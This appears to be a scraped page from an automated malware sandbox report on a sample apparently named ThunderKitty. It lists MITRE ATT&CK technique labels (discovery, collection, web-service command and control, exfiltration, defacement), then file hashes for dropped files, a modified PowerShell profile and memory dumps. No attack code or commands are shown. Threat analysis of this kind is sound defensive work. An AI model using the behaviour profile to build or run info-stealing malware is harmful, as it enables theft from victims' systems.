
Browser Information Discovery

T1217

Network Service Discovery

T1046

Permission Groups Discovery

T1069

Local Groups

T1069.001

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

System Network Connections Discovery

T1049

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
23aba7e7ecd37fd9f076dbd4d6e981e2

SHA1
40150b7db90f125b7b1c7cae65250f3a13a5bbb3

SHA256
a67ce8b05ec37c76167b8769946b840cee681b0c3a19b8d7c56835ad21221b12

SHA512
fce8455921832c8960e1aa783091b83fe17aa885b0a86e92d2ada35c76bfc79122d90b0260f6571018d7317ffee0c3bedc7f0bbf4d21a41e77d02e25892d3c9a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
3e2239307a53cbc7115fa375e0dd3a4f

SHA1
66dd1bf7a2f3ab5a34365c35456dcd73b515911f

SHA256
68f09fa9f10ee1a8f256d6630285b9f77f2713b676c3a635ceb17adae1e6e7b9

SHA512
852baecba0a8a88854a9c5042b521beb9be41cb50b6f3408cdcb6002ed99533969139a0cf30ea5965783e1460e597a293ff7a5255694f4ea3b9cd599e041378b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
fa683ba35bef5db77615e4281ba4c0fc

SHA1
e5d1b282d5160ccbc965b946bcbdaf27f99b0c2e

SHA256
d02a84de5459810a45b0434f93ecdb8413791c0ada1ae71210a92eed037538a6

SHA512
a181c916e3df8aefb8d458799e8aafb687007751a425bd288dfcd5de41c93529fde2dd5d6602a075e50f4f2f90886c9a2e6f7255b64325758ae5f355317a36e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES6A14.tmp

Filesize
1KB

MD5
f2f7809ec8f38baf53c0ff72ef97ab14

SHA1
a4a7d03e1b7036938381d6e3f36a6d9b28c41c61

SHA256
7498284ad0094ea9a252078124f3c133a7eb9ef1d1eb0541605ebd2ba54567e1

SHA512
2d476ce234def8d8cc5fa7ce7964edcaa1e56d863caff639f1e267b2e36027fac72c33631c6a0b25fbdba58c36c9289d18049c067ed4f886c7ae1f5c3e536edf

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES6C37.tmp

Filesize
1KB

MD5
9533a629d1322733c724fa30947309e9

SHA1
b8b501a9cebe500b20bb2696705edfdb3f9ebb9d

SHA256
0ebc178033e296ddf2ed5733ec6e2631167c1a12757ba32b385f4c3d2403ae6f

SHA512
90088edd7bbeb8a4ad023502ce86687136aede8041ab650ed0cb57198c8cc9f58359d347ce7e6067ee1b0ea8e81f426496925f82d2cb444c9ef6136b221f78be

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThunderKitty.zip

Filesize
64KB

MD5
6dbe63d8a521faf8186b8c9682aae5b2

SHA1
74c9270c31d64d00cad923ce2c6c05815739d837

SHA256
59036545c3416a84ce511c5508df5c1953a2959dfa43b124092eef5b7eab5aa6

SHA512
f00060d398a43cd73438e430c7766a8fbf0f93b2f7d0e9e18c1358eade195e533ec082e6e74ad62fab7ca6234a82e63d15704552687e53adbe4d8d0745d70eec

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThunderKitty\SystemInfo\ThunderKitty-ScrapedCMDS.txt

Filesize
23KB

MD5
13e44ecf36aa9455f3e1a7af2f194601

SHA1
9611bcc31e1266f09b3a8a0ea03dbc8e996b7809

SHA256
9e4a3716b101a9391f496f76fd7c781a45ea95f9487b13d94e1c2eadf3f9fa39

SHA512
4ffd50288584ccfae2b7b8b7270a3f2ff4810fdc5b4bf2b4aa6e2237f53766ee17db45a6957ecbfb0d5380945e34d49d9066aa1644ffd8a7fd6ca4265d75b704

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tddnw0dp.2tb.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\glf5fuia\glf5fuia.dll

Filesize
4KB

MD5
7e22553ee937d37475a66dad970694ac

SHA1
e9dff3dd4457a6f3cff0428ad743eba96b7af975

SHA256
845507728deef1ef3f7de9084a0b69787c595a9bea77176555fbd2c89dbfb338

SHA512
0d67787088e39d9bd48eed7c7b65795391e9ee4f9d2952ccd3a015026f863a988b4594b2271fc0ae4c8c875e19ed0b44745f4f63ff5038c7bc4e4c1883212a82

Download Submit
C:\Users\Admin\AppData\Local\Temp\r4pt3ymz\r4pt3ymz.dll

Filesize
4KB

MD5
5146df5d8181bc99cf943ef8b39ac050

SHA1
8a262f18ddc7a22559e27aeb41ab768ba1bd4cf9

SHA256
d9f957b82f7ea1a73bb9359e2efcf232bad593d502922dd6c2092b5343efe577

SHA512
a254888bf265e87d1bec65e37d718ab230aad635f8e9987dc2af988387d5ea6916581bca59d98ab7e9ee9881fe4d9003cb3e142939a07edb3fc1b0b55f92cedf

Download Submit
C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1

Filesize
2KB

MD5
9758656bbe8589c66bb241b052490c72

SHA1
b73da83fb3ae6b86c6365769a04de9845d5c602c

SHA256
e4bfe191530cc53138c4a265755539f8a115f7828faba79dfac91f3184b26351

SHA512
da9a8ecba8c2071e467f2d72fac524843fb0011c8486dd95e8b948b1c7f91bf02bcb80c20a01eddb6971b96db5ebde5f7c4c607e6b6d15e75d971ea104436e34

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\glf5fuia\CSC9D005112193949B280B94D74C9666CC3.TMP

Filesize
652B

MD5
e1d377a333619abf71dcacf6386ee42a

SHA1
0e3ea70707d406fc3dd8b9a4f621cefd6a8a9403

SHA256
96027aac2f21077c1405e9e9995a0d4dae446fbed15721e177ee6857f8691042

SHA512
1a6a2f7046ae6ff99a09aba0b3a2e0b2972c9b4307102fe4b53d1d5289fdf349bb96a6ac3753383f3a1fb2de51b45405984c8fd4f7cf4493f17a9521da9b7ce1

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\glf5fuia\glf5fuia.cmdline

Filesize
369B

MD5
9c71097c53fcdfc3b6aa41136640a3f6

SHA1
eb11a6419f5467575f702fb9744a35eb3baa4281

SHA256
ebe9546de3e22683810fbe7ce70a65e8938c05ba93ff177f956fcc1b56b59749

SHA512
48f411c8ab5cdf971ae8bc6cb76d79499eca4744f134945e61590ca2b2cef5c1a14d17e14daaaf100daa63a3815450a5c798055e5cebd715042a37df24e2b6f8

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\r4pt3ymz\CSC846F55AA1946405A98AA13EDB8AB249.TMP

Filesize
652B

MD5
b7cf7f597d9c36818c6a8874951590c8

SHA1
18d6712cb10d7365fdf4e230e7d4ae778c19740e

SHA256
aafc003d89790f5e0b1d1867e8dc498828a2df6ff9e891a628a405733bdc8a63

SHA512
966ed12ed5132d962e651b199996a1dbd9b598ca5efe1532b83913f6160890fda94b75c8a231eb204f2071a11036d6f0a21644296d45266e460fa21ee93db032

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\r4pt3ymz\r4pt3ymz.0.cs

Filesize
1KB

MD5
8a1e7edb2117ec5dde9a07016905923b

SHA1
0155dbeeb16333e2eaa767b0209750efee56f47f

SHA256
c379ac84c970f2055851b084c44575a5e4b5a70dc25f0acdd49aad306489b007

SHA512
4ff0601803a006c661c962fe158cd5e9f40031d6b4fd7c5a05969a52d812e1fcb0aab20916fcad6c61c6d44cc7cfdf1e4f344f22ced937a0cd757ad841d3ab21

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\r4pt3ymz\r4pt3ymz.cmdline

Filesize
369B

MD5
cdbe55c01c0c05600d89ae602b0d3f25

SHA1
6209c7551493a411168db8541ce26cb6891b6ddf

SHA256
42d136f204065219ffad4f498f2d82f1aa8e28267d6046c33cd20a3d310068ea

SHA512
336c33be6608a3684c63ebef6a094b26ecea3dc4bf794342d667a7b16a26741716089f50e748e7e311f7a10a51cf5a046deb1b83dda7ef28c88589b58f9f8f31

Download Submit
memory/1112-42-0x00007FFF71520000-0x00007FFF71FE1000-memory.dmp

Filesize
10.8MB

Download
memory/1112-69-0x00007FFF71520000-0x00007FFF71FE1000-memory.dmp

Filesize
10.8MB

Download
memory/1112-32-0x00007FFF71520000-0x00007FFF71FE1000-memory.dmp

Filesize
10.8MB

Download
memory/1112-7-0x00007FFF71520000-0x00007FFF71FE1000-memory.dmp

Filesize
10.8MB

Download
memory/4316-100-0x000001ACC83E0000-0x000001ACC840A000-memory.dmp

Filesize
168KB

Download
memory/4316-85-0x000001ACC5B80000-0x000001ACC5B88000-memory.dmp

Filesize
32KB

Download
memory/4316-134-0x000001ACC83D0000-0x000001ACC83DA000-memory.dmp

Filesize
40KB

Download
memory/4316-133-0x000001ACC83E0000-0x000001ACC83F2000-memory.dmp

Filesize
72KB

Download
memory/4316-101-0x000001ACC83E0000-0x000001ACC8404000-memory.dmp

Filesize
144KB

Download
memory/5016-45-0x00007FFF71520000-0x00007FFF71FE1000-memory.dmp

Filesize
10.8MB

Download
memory/5016-99-0x00007FFF71520000-0x00007FFF71FE1000-memory.dmp

Filesize
10.8MB

Download
memory/5020-94-0x00007FFF71520000-0x00007FFF71FE1000-memory.dmp

Filesize
10.8MB

Download
memory/5020-87-0x000002052B5E0000-0x000002052BD86000-memory.dmp

Filesize
7.6MB

Download
memory/5020-67-0x000002052A930000-0x000002052A938000-memory.dmp

Filesize
32KB

Download
memory/5020-0-0x00007FFF71523000-0x00007FFF71525000-memory.dmp

Filesize
8KB

Download
memory/5020-44-0x00007FFF71520000-0x00007FFF71FE1000-memory.dmp

Filesize
10.8MB

Download
memory/5020-31-0x00007FFF71520000-0x00007FFF71FE1000-memory.dmp

Filesize
10.8MB

Download
memory/5020-6-0x000002052A940000-0x000002052A962000-memory.dmp

Filesize
136KB

Download